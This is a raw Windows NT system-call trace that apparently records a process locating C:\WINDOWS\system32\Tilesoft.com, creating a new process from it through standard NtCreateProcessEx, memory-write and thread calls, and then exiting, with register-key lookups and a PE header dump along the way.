 02821   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1234476, 616, BothDirectory, 1,  (364, 0, 0, 0, 1234476, 616, BothDirectory, 1, "system32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 02822   748   NtClose  (364, ... ) == 0x0
 02823   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
 02824   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1234476, 616, BothDirectory, 1,  (364, 0, 0, 0, 1234476, 616, BothDirectory, 1, "Tilesoft.com", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0
 02825   748   NtClose  (364, ... ) == 0x0
 02826   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02827   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02828   748   NtQueryInformationProcess  (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0
 02829   748   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02830   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02831   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 364, ) == 0x0
 02832   748   NtQueryInformationToken  (364, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02833   748   NtClose  (364, ... ) == 0x0
 02834   748   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02835   748   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\Tilesoft.com"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02836   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02837   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02838   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 1236300, ... ) }, 1236300, ... ) == 0x0
 02839   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
 02840   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1235728, 616, BothDirectory, 1,  (364, 0, 0, 0, 1235728, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 02841   748   NtClose  (364, ... ) == 0x0
 02842   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
 02843   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1235728, 616, BothDirectory, 1,  (364, 0, 0, 0, 1235728, 616, BothDirectory, 1, "system32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 02844   748   NtClose  (364, ... ) == 0x0
 02845   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
 02846   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1235728, 616, BothDirectory, 1,  (364, 0, 0, 0, 1235728, 616, BothDirectory, 1, "Tilesoft.com", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0
 02847   748   NtClose  (364, ... ) == 0x0
 02848   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02849   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02850   748   NtWaitForSingleObject  (88, 0, {-1000000, -1}, ... ) == 0x0
 02851   748   NtQueryVolumeInformationFile  (344, 1236956, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 02852   748   NtQueryInformationFile  (344, 1236936, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 02853   748   NtQueryInformationFile  (344, 1236976, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 02854   748   NtReleaseMutant  (88, ... 0x0, ) == 0x0
 02855   748   NtUnmapViewOfSection  (-1, 0x1410000, ... ) == 0x0
 02856   748   NtClose  (360, ... ) == 0x0
 02857   748   NtClose  (356, ... ) == 0x0
 02858   748   NtOpenThreadToken  (-2, 0x2000000, 1, ... ) == STATUS_NO_TOKEN
 02859   748   NtOpenProcessToken  (-1, 0xa, ... 356, ) == 0x0
 02860   748   NtOpenKey  (0x2000000, {24, 16, 0x40, 0, 0,  (0x2000000, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 360, ) }, ... 360, ) == 0x0
 02861   748   NtQueryKey  (360, Basic, 520, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name= (360, Basic, 520, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name="CodeIdentifierso"}, 46, ) }, 46, ) == 0x0
 02862   748   NtClose  (360, ... ) == 0x0
 02863   748   NtOpenKey  (0x2000000, {24, 56, 0x40, 0, 0,  (0x2000000, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02864   748   NtOpenSymbolicLinkObject  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\??\C:"}, ... 360, ) }, ... 360, ) == 0x0
 02865   748   NtQuerySymbolicLinkObject  (360, ...  (360, ... "\Device\HarddiskVolume1", 48, ) , 48, ) == 0x0
 02866   748   NtClose  (360, ... ) == 0x0
 02867   748   NtQueryVolumeInformationFile  (344, 1236412, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 02868   748   NtQueryInformationFile  (344, 1236528, 528, Name, ... {status=0x0, info=64}, ) == 0x0
 02869   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02870   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02871   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 1235700, ... ) }, 1235700, ... ) == 0x0
 02872   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 360, {status=0x0, info=1}, ) }, 3, 16417, ... 360, {status=0x0, info=1}, ) == 0x0
 02873   748   NtQueryDirectoryFile  (360, 0, 0, 0, 1235128, 616, BothDirectory, 1,  (360, 0, 0, 0, 1235128, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 02874   748   NtClose  (360, ... ) == 0x0
 02875   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 360, {status=0x0, info=1}, ) }, 3, 16417, ... 360, {status=0x0, info=1}, ) == 0x0
 02876   748   NtQueryDirectoryFile  (360, 0, 0, 0, 1235128, 616, BothDirectory, 1,  (360, 0, 0, 0, 1235128, 616, BothDirectory, 1, "system32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 02877   748   NtClose  (360, ... ) == 0x0
 02878   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 360, {status=0x0, info=1}, ) }, 3, 16417, ... 360, {status=0x0, info=1}, ) == 0x0
 02879   748   NtQueryDirectoryFile  (360, 0, 0, 0, 1235128, 616, BothDirectory, 1,  (360, 0, 0, 0, 1235128, 616, BothDirectory, 1, "Tilesoft.com", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0
 02880   748   NtClose  (360, ... ) == 0x0
 02881   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02882   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02883   748   NtQueryInformationFile  (344, 1238568, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 02884   748   NtCreateSection  (0xf0005, 0x0, {217088, 0}, 2, 134217728, 344, ... 360, ) == 0x0
 02885   748   NtMapViewOfSection  (360, -1, (0x0), 0, 0, {0, 0}, 217088, 1, 0, 2, ... (0x1410000), {0, 0}, 217088, ) == 0x0
 02886   748   NtClose  (360, ... ) == 0x0
 02887   748   NtUnmapViewOfSection  (-1, 0x1410000, ... ) == 0x0
 02888   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 360, ) }, ... 360, ) == 0x0
 02889   748   NtQueryValueKey  (360,  (360, "LogFileName", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02890   748   NtClose  (360, ... ) == 0x0
 02891   748   NtQueryInformationToken  (356, User, 128, ... {token info, class 1, size 36}, 36, ) == 0x0
 02892   748   NtQueryInformationToken  (356, 15, 4, ... {token info, class 15, size 4}, 4, ) == 0x0
 02893   748   NtClose  (356, ... ) == 0x0
 02894   748   NtQuerySection  (352, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02895   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Tilesoft.com"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02896   748   NtQuerySystemInformation  (71, 4, ... {system info, class 71, size 4}, 0x0, ) == 0x0
 02897   748   NtCreateProcessEx  (1240492, 2035711, 0, -1, 4, 352, 0, 0, 0, ... ) == 0x0
 02898   748   NtSetInformationProcess  (356, PriorityClass, {process info, class 18, size 2}, 512, ... ) == 0x0
 02899   748   NtQueryInformationProcess  (356, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffda000,AffinityMask=0x1,BasePriority=8,Pid=432,ParentPid=484,}, 0x0, ) == 0x0
 02900   748   NtReadVirtualMemory  (356, 0x7ffda008, 4, ...  (356, 0x7ffda008, 4, ... "\0\0@\0", 0x0, ) , 0x0, ) == 0x0
 02901   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02902   748   NtReadVirtualMemory  (356, 0x400000, 4096, ...  (356, 0x400000, 4096, ... "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\216H\214T\312)\342\7\312)\342\7\312)\342\7\312)\343\7\265)\342\7\2506\361\7\317)\342\7\2615\356\7\313)\342\7I5\354\7\322)\342\7"6\350\7\274)\342\7"6\351\7\213)\342\7Rich\312)\342\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\5\0\366\242\347F\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\364\1\0\0\230\4\0\0\0\0\0\0\20\0\0\0\20\0\0\0\20\2\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0`\10\0\0\4\0\09z\3\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0P\272\6\0\314\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\334\271\6\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\2\0\0\20\0\0\0\364\0\0\0\4\0\0\0\0\0\0", 4096, ) 6\350\7\274)\342\7 (356, 0x400000, 4096, ... "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\216H\214T\312)\342\7\312)\342\7\312)\342\7\312)\343\7\265)\342\7\2506\361\7\317)\342\7\2615\356\7\313)\342\7I5\354\7\322)\342\7"6\350\7\274)\342\7"6\351\7\213)\342\7Rich\312)\342\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\5\0\366\242\347F\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\364\1\0\0\230\4\0\0\0\0\0\0\20\0\0\0\20\0\0\0\20\2\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0`\10\0\0\4\0\09z\3\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0P\272\6\0\314\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\334\271\6\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\2\0\0\20\0\0\0\364\0\0\0\4\0\0\0\0\0\0", 4096, ) , 4096, ) == 0x0
 02903   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 02904   748   NtQueryInformationProcess  (356, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffda000,AffinityMask=0x1,BasePriority=8,Pid=432,ParentPid=484,}, 0x0, ) == 0x0
 02905   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32"}, 1239444, ... ) }, 1239444, ... ) == 0x0
 02906   748   NtAllocateVirtualMemory  (-1, 0, 0, 2416, 4096, 4, ... 21037056, 4096, ) == 0x0
 02907   748   NtAllocateVirtualMemory  (356, 0, 0, 6432, 4096, 4, ... 65536, 8192, ) == 0x0
 02908   748   NtWriteVirtualMemory  (356, 0x10000,  (356, 0x10000, "=\0A\0:\0=\0A\0:\0\\0\0\0=\0C\0:\0=\0C\0:\0\\0s\0c\0r\0i\0p\0t\0s\0\0\0=\0U\0:\0=\0U\0:\0\\0\0\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0A\0P\0P\0D\0A\0T\0A\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0R\0O\0O\0T\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0L\0I\0B\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\0", 6432, ... 0x0, ) , 6432, ... 0x0, ) == 0x0
 02909   748   NtAllocateVirtualMemory  (356, 0, 0, 2416, 4096, 4, ... 131072, 4096, ) == 0x0
 02910   748   NtWriteVirtualMemory  (356, 0x20000,  (356, 0x20000, "\0\20\0\0p\11\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&\0\10\2\220\2\0\0\16\0\0\0\364\3\366\3\230\4\0\0@\0B\0\220\10\0\0r\0t\0\324\10\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\2\0H\11\0\0\36\0 \0L\11\0\0\0\0\2\0l\11\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 2416, ... 0x0, ) , 2416, ... 0x0, ) == 0x0
 02911   748   NtWriteVirtualMemory  (356, 0x7ffda010,  (356, 0x7ffda010, "\0\0\2\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0
 02912   748   NtWriteVirtualMemory  (356, 0x7ffda1e8,  (356, 0x7ffda1e8, "\0\0\0\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0
 02913   748   NtFreeVirtualMemory  (-1, (0x1410000), 0, 32768, ... (0x1410000), 4096, ) == 0x0
 02914   748   NtAllocateVirtualMemory  (356, 0, 0, 1048576, 8192, 4, ... 196608, 1048576, ) == 0x0
 02915   748   NtAllocateVirtualMemory  (356, 1236992, 0, 8192, 4096, 4, ... 1236992, 8192, ) == 0x0
 02916   748   NtProtectVirtualMemory  (356, (0x12e000), 4096, 260, ... (0x12e000), 4096, 4, ) == 0x0
 02917   748   NtCreateThread  (0x1f03ff, 0x0, 356, 1240500, 1240164, 1, ... 360, {432, 1328}, ) == 0x0
 02918   748   NtRequestWaitReplyPort  (24, {168, 196, new_msg, 0, 0, 0, 0, 2088821759}  (24, {168, 196, new_msg, 0, 0, 0, 0, 2088821759} "\0\0\0\0\0\0\1\0\11\344\200|\334\343\200|g\1\0\0h\1\0\0\260\1\0\00\5\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\375\177\0\0\0\0\0\0\375\177\5\20\220|" ... {168, 196, reply, 0, 484, 748, 58562, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\334\343\200|d\1\0\0h\1\0\0\260\1\0\00\5\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\375\177\0\0\0\0\0\0\375\177\5\20\220|" )  ... {168, 196, reply, 0, 484, 748, 58562, 0}  (24, {168, 196, new_msg, 0, 0, 0, 0, 2088821759} "\0\0\0\0\0\0\1\0\11\344\200|\334\343\200|g\1\0\0h\1\0\0\260\1\0\00\5\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\375\177\0\0\0\0\0\0\375\177\5\20\220|" ... {168, 196, reply, 0, 484, 748, 58562, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\334\343\200|d\1\0\0h\1\0\0\260\1\0\00\5\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\340\375\177\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\375\177\0\0\0\0\0\0\375\177\5\20\220|" )  ) == 0x0
 02919   748   NtResumeThread  (360, ... 1, ) == 0x0
 02920   748   NtClose  (344, ... ) == 0x0
 02921   748   NtClose  (352, ... ) == 0x0
 02922   748   NtDelayExecution  (0, {-2000000, -1}, ... ) == 0x0
 02923   748   NtClose  (356, ... ) == 0x0
 02924   748   NtClose  (360, ... ) == 0x0
 02925   748   NtTerminateProcess  (0, 0, ...
 01552  1480   NtWaitForMultipleObjects  ... ) == 0xc0
 02925   748   NtTerminateProcess  ... ) == 0x0
 02926   748   NtClose  (336, ... ) == 0x0
 02927   748   NtClose  (324, ... ) == 0x0
 02928   748   NtClose  (328, ... ) == 0x0
 02929   748   NtClose  (332, ... ) == 0x0
 02930   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0x14,}, 4, ... ) == 0x0
 02931   748   NtFreeVirtualMemory  (-1, (0x1040000), 0, 32768, ... (0x1040000), 65536, ) == 0x0
 02932   748   NtClose  (260, ... ) == 0x0
 02933   748   NtClose  (264, ... ) == 0x0
 02934   748   NtClose  (272, ... ) == 0x0
 02935   748   NtClose  (268, ... ) == 0x0
 02936   748   NtClose  (276, ... ) == 0x0
 02937   748   NtClose  (280, ... ) == 0x0
 02938   748   NtClose  (284, ... ) == 0x0
 02939   748   NtClose  (300, ... ) == 0x0
 02940   748   NtClose  (296, ... ) == 0x0
 02941   748   NtClose  (292, ... ) == 0x0
 02942   748   NtClose  (288, ... ) == 0x0
 02943   748   NtUserGetAtomName  (49211, 1241300, ... ) == 0xf
 02944   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02945   748   NtUserGetAtomName  (49213, 1241300, ... ) == 0xd
 02946   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02947   748   NtUserGetAtomName  (49215, 1241300, ... ) == 0x10
 02948   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02949   748   NtUserGetAtomName  (49217, 1241300, ... ) == 0x12
 02950   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02951   748   NtUserGetAtomName  (49219, 1241300, ... ) == 0xd
 02952   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02953   748   NtUserGetAtomName  (49221, 1241300, ... ) == 0xb
 02954   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02955   748   NtUserGetAtomName  (49223, 1241300, ... ) == 0xf
 02956   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02957   748   NtUserGetAtomName  (49225, 1241300, ... ) == 0xd
 02958   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02959   748   NtUserGetAtomName  (49227, 1241300, ... ) == 0x11
 02960   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02961   748   NtUserGetAtomName  (49229, 1241300, ... ) == 0xf
 02962   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02963   748   NtUserGetAtomName  (49231, 1241300, ... ) == 0x11
 02964   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02965   748   NtUserGetAtomName  (49233, 1241300, ... ) == 0xf
 02966   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02967   748   NtUserGetAtomName  (49235, 1241300, ... ) == 0xc
 02968   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02969   748   NtUserGetAtomName  (49237, 1241292, ... ) == 0xd
 02970   748   NtUserUnregisterClass  (1241352, 1560870912, 1241340, ... ) == 0x1
 02971   748   NtUserGetAtomName  (49239, 1241292, ... ) == 0x11
 02972   748   NtUserUnregisterClass  (1241352, 1560870912, 1241340, ... ) == 0x1
 02973   748   NtUserGetAtomName  (49241, 1241300, ... ) == 0xc
 02974   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02975   748   NtUserGetAtomName  (49243, 1241300, ... ) == 0xe
 02976   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02977   748   NtUserGetAtomName  (49245, 1241300, ... ) == 0x8
 02978   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02979   748   NtUserGetAtomName  (49247, 1241300, ... ) == 0xd
 02980   748   NtUserUnregisterClass  (1241360, 1560870912, 1241348, ... ) == 0x1
 02981   748   NtUnmapViewOfSection  (-1, 0x10b0000, ... ) == 0x0
 02982   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0xe,}, 4, ... ) == 0x0
 02983   748   NtFreeVirtualMemory  (-1, (0x1000000), 0, 32768, ... (0x1000000), 65536, ) == 0x0
 02984   748   NtClose  (204, ... ) == 0x0
 02985   748   NtSetInformationThread  (-2, ZeroTlsCell, {ZeroTlsCell=0xf,}, 4, ... ) == 0x0
 02986   748   NtUserQueryWindow  (65670, 0, ... ) == 0x6b8
 02987   748   NtUserQueryWindow  (65670, 1, ... ) == 0x6bc
